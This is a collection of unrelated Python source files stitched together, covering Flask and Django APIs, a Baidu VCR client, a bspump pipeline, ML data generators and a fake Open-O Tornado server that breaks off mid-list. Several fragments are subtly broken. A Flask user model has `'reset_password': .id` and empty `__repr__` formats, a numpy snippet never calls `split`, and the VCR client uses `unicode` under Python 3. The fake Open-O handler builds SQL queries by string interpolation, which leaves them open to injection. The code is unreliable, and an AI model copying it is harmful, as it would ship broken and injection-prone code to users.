'--queues=queue_f1,queue_add2,queue_sub2', '--detach', ]) learn_docker_app/api/respond.py import platform from flask import request from flask_restx import fields, Namespace, Resource respond_namespace = Namespace( 'respond', description='Provides operations that generate a simple response.' ) copy_cat_model = respond_namespace.model('Respond', { 'response': fields.String(description='The string provided.') }) @respond_namespace.route('') class Copycat(Resource): @respond_namespace.marshal_with(copy_cat_model) def get(self, string: str): return { 'response': string, } platform_model = respond_namespace.model('Host', { 'hostname_or_ip': fields.String( description='The computer’s network name (may not be fully qualified!) or its ip address.' \ 'An empty string is returned if the value cannot be determined.' ), 'system': fields.String( description='Returns the system/OS name, such as "Linux", "Darwin", ' \ '"Java", "Windows". An empty string is returned if the' \ 'value cannot be determined.' ) }) hostname_model = respond_namespace.model('Hostname', { 'host': fields.Nested(platform_model, description='Data concerning the API server.'), 'client': fields.Nested(platform_model, description='Data concerning the requesting client.'), }) @respond_namespace.route('hostname') class Hostname(Resource): @respond_namespace.marshal_with(hostname_model) def get(self): return { 'host': { 'hostname_or_ip': platform.node(), 'system': platform.system(), }, 'client': { 'hostname_or_ip': request.remote_addr, 'system': request.user_agent.platform, }, } from .external import ExternalDownloader class WgetDownloader(ExternalDownloader): """Downloader that uses the command line program wget.""" program = 'wget' args = ['-qO-'] import sys import re import datetime import asyncio import numpy as np import bspump import bspump.file import bspump.common import bspump.trigger import bspump.analyzer ### # Download test data file from: # http://opendata.praha.eu/dataset/parkovani_pr/resource/601ca22a-2c53-49e7-b396-26cc64cedc3d # and save as `TSK_data_2016_2018.csv` ### class ProgressBarProcessor(bspump.Processor): Spinner = [ "> ", ">> ", ">>> ", ">>>>", " >>>", " >>", " >", " ", ] def __init__(self, app, pipeline, id=None, config=None): super().__init__(app=app, pipeline=pipeline, id=id, config=config) self.Counter = 0 self.Time = app.Loop.time() self.StartTime = self.Time def process(self, context, event): self.Counter += 1 if (self.Counter % 10000) == 0: t = self.Pipeline.Loop.time() sys.stdout.write('\r [ {} | {} events | {:0.1f} sec | {} eps ] \r'.format( self.Spinner[(self.Counter // 10000) % len(self.Spinner)], self.nice_format(self.Counter), t - self.StartTime, self.nice_format(10000 / (t - self.Time)) )) sys.stdout.flush() self.Time = t return event @staticmethod def nice_format(v): if v > 1000000000: return "{:0.1f}G".format(v / 1000000000) if v > 1000000: return "{:0.1f}M".format(v / 1000000) if v > 1000: return "{:0.1f}k".format(v / 1000) return "{}".format(v) ### class MyTransformator(bspump.common.MappingTransformator): def build(self, app): self.TimestampRG = re.compile(r"^([0-9]{4})\-([0-9]{2})\-([0-9]{2}) ([0-9]{2}):([0-9]{2}):([0-9]{2})$") return { 'Datum_a_cas': self.timestamp, 'Vjezd': lambda k, v: (k, int(v.replace(' ', ''))), 'Vyjezd': lambda k, v: (k, int(v.replace(' ', ''))), 'Obsazenost': lambda k, v: (k, int(v.replace(' ', ''))), 'Volna_mista': lambda k, v: (k, int(v.replace(' ', ''))), 'Kapacita': lambda k, v: (k, int(v.replace(' ', ''))), } def timestamp(self, key, value): rgm = self.TimestampRG.match(value) year, month, day, hour, minute, second = (int(x) for x in rgm.groups()) dt = datetime.datetime(year=year, month=month, day=day, hour=hour, minute=minute, second=second) return '@timestamp', dt ### class MyTimeWindowAnalyzer(bspump.analyzer.TimeWindowAnalyzer): def __init__(self, app, pipeline, id=None, config=None): start_time=datetime.datetime(year=2016, month=1, day=1, hour=0, minute=0, second=0).timestamp() super().__init__(app=app, pipeline=pipeline, start_time=start_time, clock_driven=False, id=id, config=config) self.TimeWindow.add_row("P+R Zličín 1") self.TimeWindow.add_row("P+R Rajská zahrada") self.MaxTimestamp = 0.0 # simple checker if event contains time related fields def predicate(self, context, event): if '@timestamp' not in event: return False return True def evaluate(self, context, event): ts = event["@timestamp"].timestamp() if self.MaxTimestamp < ts: self.MaxTimestamp = ts self.TimeWindow.advance(self.MaxTimestamp) # find the column in timewindow matrix to fit in column = self.TimeWindow.get_column(ts) if column is None: return row = self.TimeWindow.get_row_index(event["Parkoviste"]) if row is None: return self.TimeWindow.Array[row, column] += 1 async def analyze(self): if self.TimeWindow.Array.shape[0] == 0: return # selecting part of matrix specified in configuration x = self.TimeWindow.Array[:, :] # if any of time slots is 0 if np.any(x == 0): print("Alarm!") ### class SamplePipeline(bspump.Pipeline): def __init__(self, app, pipeline_id): super().__init__(app, pipeline_id) self.build( # Download the CSV file "TSK_data_2016_2018.csv" from # http://opendata.praha.eu/dataset/parkovani_pr/resource/601ca22a-2c53-49e7-b396-26cc64cedc3d # and put it to the "examples" folder bspump.file.FileCSVSource(app, self, config={ 'path': './TSK_data_2016_2018.csv', 'post': 'noop', 'delimiter': ';', 'encoding': 'utf-8', }).on(bspump.trigger.PubSubTrigger(app, "go!", pubsub=self.PubSub)), ProgressBarProcessor(app,self), MyTransformator(app, self), MyTimeWindowAnalyzer(app, self), bspump.common.NullSink(app, self), ) self.PubSub.subscribe("bspump.pipeline.cycle_end!", self._on_cycle_end) async def _on_cycle_end(self, event_name, pipeline): await asyncio.sleep(1) svc = app.get_service("bspump.PumpService") svc.App.stop() ### if __name__ == '__main__': app = bspump.BSPumpApplication() svc = app.get_service("bspump.PumpService") # Construct and register Pipeline pl = SamplePipeline(app, 'SamplePipeline') svc.add_pipeline(pl) pl.PubSub.publish("go!") app.run() twa = pl.locate_processor('MyTimeWindowAnalyzer') print("TWA:", twa) if twa is not None: print(twa.TimeWindow) from rest_framework import viewsets from rest_framework.decorators import action from rest_framework.pagination import PageNumberPagination from django_filters.rest_framework import DjangoFilterBackend from rest_framework.response import Response from rest_framework import status from perm.models import PerMisson from perm.filters import PerMissonFilter from application.models import Application from users.models import tGroup from django.contrib.auth import get_user_model from perm.serializers import PermListSerializer, \ PermDetailSerializer, \ PermCreateSerializer, \ PermListSimpleSerializer, \ PermUserSerializer, \ PermAppSerializer, \ PermtGroupSerializer, \ PermUpdateSerializer User = get_user_model() # 权限分页 class PermissonPagination(PageNumberPagination): page_size = 10 page_size_query_param = 'page_size' page_query_param = 'page' max_page_size = 100 # 权限视图 class PermissonViewSet(viewsets.ModelViewSet): queryset = PerMisson.objects.all() serializer_class = PermDetailSerializer pagination_class = PermissonPagination filter_backends = (DjangoFilterBackend,) filter_class = PerMissonFilter def get_serializer_class(self): if self.action == 'list': return PermListSerializer if self.action == 'create': return PermCreateSerializer if self.action == 'update': return PermUpdateSerializer return PermDetailSerializer @action(detail=False, methods=['get'], name="get all permisson", url_path="getall") def get_perm_all(self, request, pk=None): permsqs = PerMisson.objects.all() serializer = PermListSimpleSerializer(permsqs, many=True) return Response(serializer.data, status=status.HTTP_200_OK) @action(detail=False, methods=['get'], name="get all users", url_path="getusers") def get_all_users(self, request, pk=None): users = User.objects.all() serializer = PermUserSerializer(users, many=True) return Response(serializer.data, status=status.HTTP_200_OK) @action(detail=False, methods=['get'], name="get all apps", url_path="getapps") def get_all_apps(self, request, pk=None): apps = Application.objects.all() serializer = PermAppSerializer(apps, many=True) return Response(serializer.data, status=status.HTTP_200_OK) @action(detail=False, methods=['get'], name="get all groups", url_path="getgroups") def get_all_tgroups(self, request, pk=None): tgroups = tGroup.objects.all() serializer = PermtGroupSerializer(tgroups, many=True) return Response(serializer.data, status=status.HTTP_200_OK) @action(detail=True, methods=['get'], name='group outside user', url_path="getusers_out") def get_outside_user(self, request, pk=None): users = User.objects.exclude(granted_by_permissions__id=pk) serializer = PermUserSerializer(users, many=True) return Response( serializer.data, status=status.HTTP_200_OK ) @action(detail=True, methods=['get'], name='group outside apps', url_path="getapps_out") def get_outside_apps(self, request, pk=None): apps = Application.objects.exclude(granted_by_permissions__id=pk) serializer = PermAppSerializer(apps, many=True) return Response( serializer.data, status=status.HTTP_200_OK ) @action(detail=True, methods=['get'], name='group outside groups', url_path="getgroups_out") def get_outside_tgroup(self, request, pk=None): groups = tGroup.objects.exclude(granted_by_permissions__id=pk) serializer = PermtGroupSerializer(groups, many=True) return Response( serializer.data, status=status.HTTP_200_OK ) datasets/download/download_dataset.py1-10 import boto3 import botocore import constants import utils as ut import argparse if __name__ == '__main__': parser = argparse.ArgumentParser() parser.add_argument('name', type=str, help = "Name of dataset to be downloaded") parser.add_argument('data_dir', type=str, help = "Diretory to download dataset to") args = parser.parse_args() ut.download_and_unzip(args.name, args.data_dir) 0 # Copyright 2017 Baidu, Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file # except in compliance with the License. You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software distributed under the # License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, # either express or implied. See the License for the specific language governing permissions # and limitations under the License. """ This module provides a client class for VCR. """ import copy import json import logging from builtins import str from builtins import bytes from baidubce.auth import bce_v1_signer from baidubce.bce_base_client import BceBaseClient from baidubce.http import bce_http_client from baidubce.http import handler from baidubce.http import http_methods from baidubce.utils import required _logger = logging.getLogger(__name__) class VcrClient(BceBaseClient): """ vcr client """ def __init__(self, config=None): BceBaseClient.__init__(self, config) @required(source=(bytes, str)) def put_media(self, source, auth=None, description=None, preset=None, notification=None, config=None): """ Check a media. :param source: media source :type source: string or unicode :param auth: media source auth param :type auth: string or unicode :param description: media description :type description: string or unicode :param preset: analyze preset name :type preset: string or unicode :param notification: notification name :type notification: string or unicode :return: **Http Response** """ body = { 'source': source } if auth is not None: body['auth'] = auth if description is not None: body['description'] = description if preset is not None: body['preset'] = preset if notification is not None: body['notification'] = notification return self._send_request(http_methods.PUT, b'/v1/media', body=json.dumps(body), config=config) @required(source=(bytes, str)) def get_media(self, source, config=None): """ :param source: media source :type source: string or unicode :return: **Http Response** """ return self._send_request(http_methods.GET, b'/v1/media', params={b'source': source}, config=config) @required(source=(bytes, str)) def put_stream(self, source, preset=None, notification=None, config=None): """ :param source: media source :type source: string or unicode :param preset: analyze preset name :type preset: string or unicode :param notification: notification name :type notification: string or unicode :return: **Http Response** """ body = { 'source': source } if preset is not None: body['preset'] = preset if notification is not None: body['notification'] = notification return self._send_request(http_methods.POST, b'/v1/stream', body=json.dumps(body), config=config) @required(source=(bytes, str)) def get_stream(self, source, start_time=None, end_time=None, config=None): """ :param source: media source :type source: string or unicode :param start_time: None :type start_time: string or unicode :param end_time: start_time should be earlier than end_time :type end_time: string or unicode :return: **Http Response** """ params = {b'source': source} if start_time is not None: params[b'startTime'] = start_time if end_time is not None: params[b'endTime'] = end_time return self._send_request(http_methods.GET, b'/v1/stream', params=params, config=config) @required(source=(bytes, str)) def put_image(self, source, preset=None, config=None): """ :param source: media source :type source: string or unicode :param preset: analyze preset name :type preset: string or unicode :return: **Http Response** """ body = { 'source': source } if preset is not None: body['preset'] = preset return self._send_request(http_methods.PUT, b'/v1/image', body=json.dumps(body), config=config) @required(text=(bytes, str)) def put_text(self, text, preset=None, config=None): """ :param text: string :type text: text to check :param preset: analyze preset name :type preset: string or unicode :return: **Http Response** """ body = { 'text': text } if preset is not None: body['preset'] = preset return self._send_request(http_methods.PUT, b'/v1/text', body=json.dumps(body), config=config) @required(lib=(str, unicode), brief=(str, unicode), image=(str, unicode)) def add_face_image(self, lib, brief, image, config=None): """ :param lib: private face lib :param brief: private face brief :param image: private face image :return: **Http Response** """ body = { 'brief': brief, 'image': image } return self._send_request(http_methods.POST, '/v1/face/lib/%s' % lib, body=json.dumps(body), config=config) @required(lib=(str, unicode), brief=(str, unicode)) def del_face_brief(self, lib, brief, config=None): """ :param lib: private face lib :param brief: private face brief :return: **Http Response** """ params = { 'brief': brief } return self._send_request(http_methods.DELETE, '/v1/face/lib/%s' % lib, params=params, config=config) @required(lib=(str, unicode), brief=(str, unicode), image=(str, unicode)) def del_face_image(self, lib, brief, image, config=None): """ :param lib: private face lib :param brief: private face brief :param image: private face image :return: **Http Response** """ params = { 'brief': brief, 'image': image } return self._send_request(http_methods.DELETE, '/v1/face/lib/%s' % lib, params=params, config=config) @required(lib=(str, unicode)) def get_face_lib(self, lib, config=None): """ :param lib: private face lib :return: **Http Response** """ return self._send_request(http_methods.GET, '/v1/face/lib/%s' % lib, config=config) @required(lib=(str, unicode), brief=(str, unicode)) def get_face_brief(self, lib, brief, config=None): """ :param lib: private face lib :param brief: private face brief :return: **Http Response** """ params = { 'brief': brief } return self._send_request(http_methods.GET, '/v1/face/lib/%s' % lib, params=params, config=config) @required(lib=(str, unicode), brief=(str, unicode), image=(str, unicode)) def add_logo_image(self, lib, brief, image, config=None): """ :param lib: private logo lib :param brief: private logo brief :param image: private logo image :return: **Http Response** """ body = { 'brief': brief, 'image': image } return self._send_request(http_methods.POST, '/v1/logo/lib/%s' % lib, body=json.dumps(body), config=config) @required(lib=(str, unicode), brief=(str, unicode)) def del_logo_brief(self, lib, brief, config=None): """ :param lib: private logo lib :param brief: private logo brief :return: **Http Response** """ params = { 'brief': brief } return self._send_request(http_methods.DELETE, '/v1/logo/lib/%s' % lib, params=params, config=config) @required(lib=(str, unicode), image=(str, unicode)) def del_logo_image(self, lib, image, config=None): """ :param lib: private logo lib :param image: private logo image :return: **Http Response** """ params = { 'image': image } return self._send_request(http_methods.DELETE, '/v1/logo/lib/%s' % lib, params=params, config=config) @required(lib=(str, unicode)) def get_logo_lib(self, lib, config=None): """ :param lib: private logo lib :return: **Http Response** """ return self._send_request(http_methods.GET, '/v1/logo/lib/%s' % lib, config=config) @required(lib=(str, unicode), brief=(str, unicode)) def get_logo_brief(self, lib, brief, config=None): """ :param lib: private logo lib :param brief: private logo brief :return: **Http Response** """ params = { 'brief': brief } return self._send_request(http_methods.GET, '/v1/logo/lib/%s' % lib, params=params, config=config) @staticmethod def _merge_config(self, config): if config is None: return self.config else: new_config = copy.copy(self.config) new_config.merge_non_none_values(config) return new_config def _send_request( self, http_method, path, body=None, headers=None, params=None, config=None, body_parser=None): config = self._merge_config(self, config) if body_parser is None: body_parser = handler.parse_json return bce_http_client.send_request( config, bce_v1_signer.sign, [handler.parse_error, body_parser], http_method, path, body, headers, params) import os import sys import numpy as np import pandas as pd from scipy import sparse from tensorflow import keras class ContentVaeDataGenerator(keras.utils.Sequence): ''' Generate the training and validation data for the content part of vae model. ''' def __init__(self, data_root, batch_size, batch_num=None, prev_layers=[], noise_type=None, joint=False, shuffle=True): feature_path = os.path.join(data_root, "item_features.npz") self.features = sparse.load_npz(feature_path) self.num_items = self.features.shape[0] self.batch_size = batch_size self.batch_num = batch_num if prev_layers != []: self.apply_prev_layers(self.features, prev_layers) ### Whether or not, or add which type of noise. self.noise_type = noise_type ### Shuffle the items if necessary. self.indexes = np.arange(self.num_items) self.shuffle = shuffle if self.shuffle: self.on_epoch_end() ### Train jointly with the collaborative part self.joint = joint def __len__(self): ''' The total number of batches. ''' if self.batch_num is None: batch_num = self.num_items//self.batch_size if self.num_items%self.batch_size != 0: batch_num+=1 else: batch_num = self.batch_num return batch_num def __getitem__(self, i): ''' Return the batch indexed by i. ''' batch_idxes = self.indexes[i*self.batch_size:(i+1)*self.batch_size] batch_target = self.features[batch_idxes].toarray() if self.noise_type is None: batch_input = batch_target else: batch_input = self.add_noise(self.noise_type, batch_target) if self.joint: batch_input = [batch_input, self.z_b[batch_idxes]] batch_target = batch_target return batch_input, batch_target def apply_prev_layers(self, features, prev_layers): ''' Apply the previous pretrained layers on the feature ''' batch_num = self.__len__() ori_features = features.toarray() for prev_layer in prev_layers: new_dims = prev_layer.outputs[0].shape.as_list()[-1] new_features = np.zeros((self.num_items, new_dims), dtype=np.float32) for i in range(batch_num): new_features[i*self.batch_size:(i+1)*self.batch_size] = prev_layer( ori_features[i*self.batch_size:(i+1)*self.batch_size] ) ori_features = new_features self.features = sparse.csr_matrix(new_features) def on_epoch_end(self): ''' Shuffle the item index after each epoch. ''' if self.shuffle: np.random.shuffle(self.indexes) def add_noise(self, noise_type, contents): ''' corrupt the inputs and train as SDAE style. ''' if 'Mask' in noise_type: frac = float(noise_type.split('-')[1]) masked_contents = np.copy(contents) for item in masked_contents: zero_pos = np.random.choice(len(item), int(round( frac*len(item))), replace=False) item[zero_pos] = 0 return masked_contents else: raise NotImplementedError def update_previous_bstep(self, z_b): self.z_b = z_b @property def feature_dim(self): return self.features.shape[-1] class CollaborativeVAEDataGenerator(keras.utils.Sequence): def __init__(self, data_root, phase, batch_size, batch_num=None, ragged_x=False, reuse=True, joint=True, shuffle=True): ''' Generate the training and validation data for the collaborative part of vbae model. ''' assert phase in ["train", "val", "test"], "Phase must be [train, val, test]" self.phase = phase self.batch_size = batch_size self.batch_num = batch_num self.ragged_x = ragged_x self.data_root = data_root self._load_data(data_root, reuse=reuse, ragged_x=ragged_x) self.shuffle = shuffle if self.shuffle: self.on_epoch_end() ### Train jointly with the content part self.joint = joint def _load_data(self, data_root, reuse, ragged_x): ### Load the dataset meta_table = pd.read_csv(os.path.join(data_root, "meta.csv")) self.num_items = meta_table["num_items"][0] if self.phase == "train": obs_path = os.path.join(data_root, "train.csv") obs_records = pd.read_csv(obs_path) obs_group = obs_records.groupby("uid") unk_group = obs_group else: obs_path = os.path.join(data_root, "{}_obs.csv".format(self.phase)) unk_path = os.path.join(data_root, "{}_unk.csv".format(self.phase)) obs_records = pd.read_csv(obs_path) unk_records = pd.read_csv(unk_path) obs_group = obs_records.groupby("uid") unk_group = unk_records.groupby("uid") ### IDs and corresponding indexes self.user_ids = np.array(pd.unique(obs_records["uid"]), dtype=np.int32) self.indexes = np.arange(len(self.user_ids)) self.num_users = len(self.user_ids) X_path = os.path.join(data_root, "{}_X.npz".format(self.phase)) Y_path = os.path.join(data_root, "{}_Y.npz".format(self.phase)) if reuse and os.path.exists(X_path) and os.path.exists(Y_path): self.X = sparse.load_npz(X_path) self.Y = sparse.load_npz(Y_path) else: ### Represent the whole dataset with a huge sparse matrix rows_X, cols_X, rows_Y, cols_Y = [], [], [], [] for i, user_id in enumerate(self.user_ids): try: group_X = obs_group.get_group(user_id) group_Y = unk_group.get_group(user_id) except: import pdb pdb.set_trace() rows_X += [i]*len(group_X); cols_X += list(group_X["vid"]-1) rows_Y += [i]*len(group_Y); cols_Y += list(group_Y["vid"]-1) self.X = sparse.csr_matrix((np.ones_like(rows_X, dtype=np.float32), (rows_X, cols_X)), dtype='float32', shape=(self.num_users, self.num_items)) self.Y = sparse.csr_matrix((np.ones_like(rows_Y, dtype=np.float32), (rows_Y, cols_Y)), dtype='float32', shape=(self.num_users, self.num_items)) if reuse: sparse.save_npz(X_path, self.X) sparse.save_npz(Y_path, self.Y) if ragged_x: self.X = self.X.tolil().rows def on_epoch_end(self): if self.shuffle: np.random.shuffle(self.indexes) def __len__(self): if self.batch_num is None: batch_num = self.num_users//self.batch_size if self.num_users%self.batch_size != 0: batch_num+=1 else: batch_num = self.batch_num return batch_num def __getitem__(self, i): batch_idxes = self.indexes[i*self.batch_size:(i+1)*self.batch_size] batch_X = self.X[batch_idxes] if self.ragged_x \ else self.X[batch_idxes].toarray() batch_Y = self.Y[batch_idxes].toarray() return (batch_X, batch_Y) def update_previous_tstep(self, z_t): self.z_t = z_t @property def target_shape(self): return self._target_shape if __name__ == '__main__': passimport torch.nn as nn class CancerClassifier(nn.Module): '''유방암 분류기 신경망 클래스''' def __init__(self, input_size, output_size): self.input_size = input_size self.output_size = output_size super().__init__() self.layers = nn.Sequential( nn.Linear(input_size, 22), nn.LeakyReLU(), #nn.BatchNorm1d(22), nn.Linear(22, 15), nn.LeakyReLU(), #nn.BatchNorm1d(15), nn.Linear(15, 10), nn.LeakyReLU(), #nn.BatchNorm1d(10), nn.Linear(10, 5), nn.LeakyReLU(), #nn.BatchNorm1d(5), nn.Linear(5, 4), nn.LeakyReLU(), #nn.BatchNorm1d(4), nn.Linear(4, 3), nn.LeakyReLU(), #nn.BatchNorm1d(3), nn.Linear(3, output_size), nn.Sigmoid(), ) def forward(self, x): return self.layers(x) WEEKS/CD_Sata-Structures/_MISC/misc-examples/myhash2.py class HashTableEntry: def __init__(self, key, value): self.key = key self.value = value def __repr__(self): return f"HashTableEntry({repr(self.key)},{repr(self.value)})" # lets refactor some code hash_table = [None] * 8 # 8 slots, all initiailized to None def my_hash(s): sb = s.encode() # Get the UTF-8 bytes for the string sum = 0 for b in sb: sum += b sum &= 0xFFFFFFFF # clamp to 32 bits return sum # hash the index def hash_index(key): h = my_hash(key) return h % len(hash_table) # put def put(key, val): i = hash_index(key) # while the hash_table[i] != None # then increment index and try again if hash_table[i] != None: print(f"Collision! Overwriting {repr(hash_table[i])}") hash_table[i] = HashTableEntry(key, val) # get def get(key): i = hash_index(key) entry = hash_table[i] if entry == None: return None # while the entry.key != key # then increment index and try again return entry.value # delete def delete(key): i = hash_index(key) hash_table[i] = None if __name__ == "__main__": # put("Hello", "Hello Value") # put("World", "World Value") # print(f"{hash_table}\n") # put("foo", "foo value") # "foo" hashes to same index as "Hello" # # AKA "foo collides with Hello" # print(f"\n{hash_table}\n"); # v = get("Hello") # print(f'Hello value is: {v}') # Should be "Hello Value", but gives "foo value" pass from app import db, app from datetime import datetime from werkzeug.security import generate_password_hash, check_password_hash from flask_login import UserMixin from app import login from time import time import jwt @login.user_loader def load_user(id): return User.query.get(int(id)) followers = db.Table('followers', db.Column('follower_id', db.Integer, db.ForeignKey('user.id')), db.Column('followed_id', db.Integer, db.ForeignKey('user.id')) ) class User(UserMixin, db.Model): id = db.Column(db.Integer, primary_key=True) username = db.Column(db.String(64), index=True, unique=True) email = db.Column(db.String(128), index=True, unique=True) password_hash = db.Column(db.String(128)) posts = db.relationship('Post', backref='author', lazy='dynamic') about_me = db.Column(db.String(128)) last_seen = db.Column(db.DateTime, default=datetime.utcnow) followed = db.relationship( 'User', secondary=followers, primaryjoin=(followers.c.follower_id == id), secondaryjoin=(followers.c.followed_id == id), backref=db.backref('followers', lazy='dynamic'), lazy='dynamic') def __repr__(self): return ''.format(self.username) def set_password(self, password): self.password_hash = generate_password_hash(password) def check_password(self, password): return check_password_hash(self.password_hash, password) def follow(self, user): if not self.is_following(user): self.followed.append(user) def unfollow(self, user): if self.is_following(user): self.followed.remove(user) def is_following(self, user): ''' The is_following() method issues a query on the followed relationship to check if a link between two users already exists. You have seen me use the filter_by() method of the SQLAlchemy query object before, for example to find a user given its username. The filter() method that I'm using here is similar, but lower level, as it can include arbitrary filtering conditions, unlike filter_by() which can only check for equality to a constant value. The condition that I'm using in is_following() looks for items in the association table that have the left side foreign key set to the self user, and the right side set to the user argument. The query is terminated with a count() method, which returns the number of results. The result of this query is going to be 0 or 1, so checking for the count being 1 or greater than 0 is actually equivalent. Other query terminators you have seen me use in the past are all() and first(). ''' return self.followed.filter( followers.c.followed_id == user.id).count() > 0 def followed_posts(self): ''' Followed format: Post.query.join(...).filter(...).order_by(...) https://blog.miguelgrinberg.com/post/the-flask-mega-tutorial-part-viii-followers ''' followed = Post.query.join( followers, (followers.c.followed_id == Post.user_id)).filter( followers.c.follower_id == self.id) own = Post.query.filter_by(user_id=self.id) return followed.union(own).order_by(Post.timestamp.desc()) def get_reset_password_token(self, expires_in=600): return jwt.encode( {'reset_password': .id, 'exp': time() + expires_in}, app.config['SECRET_KEY'], algorithm='HS256').decode('utf-8') @staticmethod def verify_reset_password_token(token): try: id = jwt.decode(token, app.config['SECRET_KEY'], algorithms=['HS256'])['reset_password'] except: return return User.query.get(id) class Post(db.Model): id = db.Column(db.Integer, primary_key=True) body = db.Column(db.String(256)) timestamp = db.Column(db.DateTime, index=True, default=datetime.utcnow) user_id = db.Column(db.Integer, db.ForeignKey('user.id')) def __repr__(self): return ''.format(self.body) PRASAD-DANGARE/PYTHON # Python Program To Add Two Numbers Using Arguments Parser(Integer,Float) ''' Function Name : Calculate Sum Of Two Numbers Using Argument Parser Function Date : 27 Aug 2020 Function Author : Input : Integer,Float Output : Float ''' from argparse import ArgumentParser # Create Argument Parser Class Object parser = ArgumentParser(description="This Program Calculate The Sum Of Two Numbers:") # Add Two Arguments With The Name n1 And n2 And Type As Float parser.add_argument("n1", type=float, help="input first number") parser.add_argument("n2",type=float, help="input second number") # Retrive The Arguments Passed To Program args = parser.parse_args() # Convert The n1 And n2 Value Into Float Type Then Add Them result = float(args.n1)+float(args.n2) print("Sum Of Two Numbers Are =", result) 1-10 import numpy arr = input().split() n, m, p = map(int, arr) list = [] for i in range(0, n + m): list.append([x for x in input().split]) print(numpy.array(list, int))from .base import PyObjectId from bson import ObjectId from pydantic import BaseModel, Field from typing import List class DbTestSet(BaseModel): id: PyObjectId = Field(alias="_id") name: str ids: List[PyObjectId] class Config: allow_population_by_field_name = True json_encoders = {ObjectId: str} schema_extra = { "example": {} } #!/usr/bin/env python # -*- coding: utf-8 -*- # # Copyright 2016-2017 China Telecommunication Co., Ltd. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # __author__ = 'liyiqun' import tornado.httpserver import tornado.ioloop import tornado.options import tornado.web import json import re from db_util import mysql_utils from common import * import datetime from base_handler import base_handler class ms_handler(base_handler): def initialize(self): super(ms_handler, self).initialize() pass #For service register def post(self, dummy): ctnt = self.request.body print 'Fake Open-O: Received post \n' print str(ctnt) try: req = json.loads(str(ctnt)) except: self.write('Invalid Request') self.finish() sn = req['serviceName'] if sn not in self.application.service_entry: self.application.service_entry[sn] = req else: added = [] nodes = req['nodes'] for n in nodes: exists = 0 for ex in self.application.service_entry[sn]['nodes']: if ex['ip'] == n['ip'] and ex['port'] == n['port']: exists = 1 break pass if not exists: added.append(n) pass self.application.service_entry[sn]['nodes'] += added self.write('{}') self.finish() pass #For servcie query def get(self, input): serv = {} m = self.application.query_service_pat.match(input) if m and m.groups(): sn = m.groups()[0] if sn in self.application.service_entry: serv = self.application.service_entry[sn] print 'Fake Open-O service: Returned get \n' print(json.dumps(serv)) self.write(json.dumps(serv)) self.finish() pass class driver_handler(base_handler): def initialize(self): super(driver_handler, self).initialize() pass #For driver register def post(self, dummy): ctnt = self.request.body print 'Fake Open-O driver: Received post \n' print str(ctnt) try: req = json.loads(str(ctnt)) except: self.write('Invalid Request') self.finish() sn = req['driverInfo']['driverName'] if sn not in self.application.service_entry: self.application.service_entry[sn] = req else: added = [] services = req['driverInfo']['services'] for item in services: exists = 0 for ex in self.application.service_entry[sn]['driverInfo']['services']: if ex['service_url'] == item['service_url']: exists = 1 break pass if not exists: added.append(item) pass self.application.service_entry[sn]['driverInfo']['services'] += added self.write('{}') self.finish() pass #For driver query def get(self, input): serv = [ { "driverName": "sdno-driver-ct-te", "instanceID": "vnfm-0-1", "ip": "10.23.63.21", "port": "23456", "protocol": "http", "services": [ { "service_url":"/openoapi/sbi-l3vpn/v1", "support_sys":[ { "type":"Agile Controller-DCN", "version":"V100R002" }, { "type":"Agile Controller-DCN", "version":"V100R003" } ] }, { "service_url":"/openoapi/sbi-l2vpn/v1", "support_sys":[ { "type":"Agile Controller-DCN", "version":"V100R003" } ] } ] }] serv = [{"driverInfo": {"protocol": "REST", "instanceID": "sdno-driver-ct-te_ID", "ip": "127.0.0.1", "driverName": "sdno-driver-ct-te", "services": [{"support_sys": [{"version": "v1", "type": "ct_te_driver"}], "service_url": "/openoapi/sdno-driver-ct-te/v1/"}], "port": 8670}}] print 'Fake Open-O driver: Returned get \n' print(json.dumps(serv)) self.write(json.dumps(serv)) self.finish() pass class esr_handler(base_handler): def initialize(self): super(esr_handler, self).initialize() pass #For ers controller query def post(self, dummy): ctnt = self.request.body print 'Fake Open-O esr: Received post \n' print str(ctnt) try: req = json.loads(str(ctnt)) except: self.write('Invalid Request') self.finish() resp = {'driver_url':'', 'type':'', 'vendor':'ZTE', 'version':''} self.write(json.dumps(resp)) self.finish() pass def get(self, input): resp = { "sdnControllerId":"a6c42529-cd6b-4c01-b149-03eb54b20a03", "name":"sdn", "url":"http://10.74.151.13:8181", "userName":"admin", "password":"", "version":"v1.0", "vendor":"ZTE", "description":"", "protocol":"netconf", "productName":"", "type":"ODL", "createTime":"2016-07-18 12:22:53" } self.write(json.dumps(resp)) self.finish() pass class brs_handler(base_handler): def initialize(self): super(brs_handler, self).initialize() pass def get(self, input): resp = {} db = mysql_utils('topology') if input.startswith('managed-elements'): 'Get equipments' sql_txt = 'SELECT * FROM t_router' res = db.exec_sql(sql_txt) num = len(res) resp['totalNum'] = num eles = [] for e in res: one_me = {'id':str(e[0]), 'name':e[2],'ipAddress':e[4], 'community':e[5], 'x':e[7], 'y':e[8], 'manufacturer':e[6]} eles.append(one_me) pass resp['managedElements'] = eles elif input.startswith('logical-termination-points'): meid = input.split('=')[1] sql_txt = 'SELECT * FROM t_port where router_id=%s' % str(meid) res = db.exec_sql(sql_txt) num = len(res) resp['totalNum'] = num ports = [] for p in res: one_p = {'id':str(p[0]), 'name':p[4], 'portIndex':p[9], 'phyBW':p[5], 'macAddress':p[6], 'ipAddress':p[8], 'type':p[2] } ports.append(one_p) resp['logicalTerminationPoints'] = ports elif input.startswith('topological-links'): sql_txt = 'SELECT * FROM t_link' res = db.exec_sql(sql_txt) num = len(res) resp['totalNum'] = num lks = [] for lk in res: one_lk = {'id':str(lk[0]), 'aEnd':str(lk[1]), 'zEnd':str(lk[2]), 'phyBW':lk[4]} lks.append(one_lk) resp['topologicalLinks'] = lks pass self.write(json.dumps(resp)) self.finish() pass class openo_app(tornado.web.Application): def __init__(self): handlers = [ (r'/openoapi/microservices/v1/services(.*)', ms_handler), (r'/openoapi/sdno-brs/v1/(.*)', brs_handler), (r'/openoapi/extsys/v1/sdncontrollers(.*)', esr_handler), 